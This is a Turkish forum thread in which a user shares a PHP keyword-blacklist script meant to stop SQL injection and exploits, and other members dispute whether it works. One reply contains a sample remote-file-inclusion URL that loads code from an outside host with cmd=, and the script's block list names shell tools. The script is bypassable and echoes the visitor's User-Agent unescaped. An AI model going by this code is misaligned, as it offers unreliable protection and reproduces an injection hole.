SQL Injection ve Exploite son

[fesih]

makale adresi: http://www.fesih.com/ckonup-39.html

Şimdi anlatacağım yöntemle sql injektion ve exploit ile sitenize sızmaları engelliyoruz.

Benim sitemde zaten exploit açığı filan yok demeyim. kuracağınız yalnış bir eklentide açık olduğunu farzedin. 

Şimdi

Kod:

guvenlik.php

diye bir dosya oluşturun. içinde bu kodları atacaksınız. Ve sitenizin root dizinine gönderin.

Kod:

<?php 
  
  $feso = $_SERVER['QUERY_STRING']; 
  $fesoprotector = array('chr(', 'wget', 'cmd=', 'rush=', 'union', 'UNION', 'echr(', 'esystem(', 'cp%20', 'mdir%20', 'mcd%20', 'mrd%20', 'rm%20', 'mv%20', 'rmdir%20', 'chmod(', 'chmod%20', 'chown%20', 'chgrp%20', 'locate%20', 'grep%20', 'diff%20', 'kill%20', 'kill(', 'killall', 'passwd%20', 'telnet%20', 'vi(', 'vi%20', 'INSERT%20INTO', 'SELECT%20', 'nigga', 'fopen', 'fwrite', '$_REQUEST', '$_GET'); 
  $fesihbaba = str_replace($fesoprotector, '*', $feso); 
  
  if ($feso != $fesihbaba) 
    { 
      $hadegit = $_SERVER['REMOTE_ADDR']; 
      $hesocan = $_SERVER['HTTP_USER_AGENT']; 
      $telefonno = GETENV("REMOTE_ADDR"); 
  
      die( "senin adresin Ip:$telefonno $i$hesocan" ); 
    } 
 echo "<!-- http://www.fesih.com/ckonut-21.html 
php güvenlik scripti. Tüm php kodlanmış siteler için. script yazılım 2006 fesih.com - diyarbekirli[at]gmail.com -->"; 

?> 

mysql bağlantı dosyasına kodu bu şekil ekleyin.

Kod:

require_once("guvenlik.php"); 

siteniz mysql destekli değilse. yani veri tabanı kullanmıyorsanız.

tüm php dosyalarınıza bu kodu ekleyeceksiniz.

Kod:

Kod:

<?php require_once("guvenlik.php"); ?>

guvenlik.php dosyasınıda root dizinine atmayı unutmayın tabi

[fesih]

Makale istekleri ve Yorumlar  yaziyor baslikk olarak. bende buraya yazdim.

ama yazilan makalelerin tumu tasinmis

[shapcy]

Evet, makaleleri sitenin ana sayfasındaki "Makaleler" bölümüne ekliyoruz. Makalenizin yayınlanmasını istiyorsanız yönetim ile irtibata geçebilirsiniz.

İyi çalışmalar...

[mudkicker]

Bu scripti atlatadabilirsin. Tam koruma sağlayamazsın böyle.

[Achilles]

yazdığınız kodun doğruluğundan ziyade önce forum kurallarını okumalısınız, gönderdiğiniz mesajlar seviyeli olmalı
lütfen buna özen gösterin

[fesih]

@Achilles

Forum kurallarını okudum ama. mesajıma aykırı her hangi bi kuralı göremedim. maksadın scriptteki kötü sözse, sildim onu. 
özür dilerim 

@mudkicker

Geliştirmek elimizde. Şuanki haliyle titlede oradaki karakterler geçerse. hemen engelliyor.
mesela exploit ile sunucudaki başka bir sitenin üzerinden sizin siteye geçebilirler (eğer sunucuda gerekli güvenliği almamışsa. Çoğu sunuda malesef siteden siteye geçiş sağlanıyor )
başka bir site üzerinden sitenize geçiş yaptıklarında. adres çubuğu bu olurki
ahmet.com/index.php?id=http://fesih.com/codeex.txt?=........sizinsite... filan dosya.. kodun sonu =cmd= gibi gider. kullandığınız script bu olyı engeller.

 Genelde kullanılan exploit geçişlerinde cmd= adres çubuğunda olur.
örnek http://fesih.com/modules.php?name=coppermine&file=displayimage&meta=lastcom&cat=0&pos=http://fesih.com/codeex.txt?cmd= böyle bişiler mesela.

 ama bildiğiniz başka komutlar varsa ekleyelim. bence bu ufak kod bile çoğu güvenlik pakatlerinden sağlam.

@shapcy

işe yarayacaksa admin burda eklesin. valla şimdi gecenin bu vakti iletişim şeysini arayamam

[Achilles]

eğer bahsettiğin şekilde bir açık sözkonusu ise query string'deki komutlar çalışacak ve yazdığın php scripti uyuyor durumda olacak
yazdığınız kod doğrumudur değil midir tartışmak istemiyorum ama bir makale sadece koddan ibaret değildir.
sanırım konu hazır scriptler bölümü olsaydı daha doğru olurdu

[fesih]

@Achilles

yaff bi makale ekleyecen sitene. yazıkta yaranamıyoruz sana.

ne kılbi adammışın sen ya. eklemiyosan ve kullanmıyorsan kullanma kardeşim. kalsın belki işine yarayacak insanlar vardır.
alla ala
 gine gerildim. illa psikopata bağlayacaksınız beni . 
bende http://www.turk-php.com/smf/index.php?action=adifykarma;sa=smite;uid=42245;topic=1506.0;m=8858 burayı tıkladım işte.
uyuz ettin beni çünkü

mademki exploid ve sql injektiona çözüm değil çözüm değil. beraber geliştirelim dedim.

 senin dediğin şekil zaten türkiyede site hackleyecek 5-10 adamdan başka insan yoktur.

bu kod bile türkiyedeki kendini hacker sanan  binlerce lameri durdurur.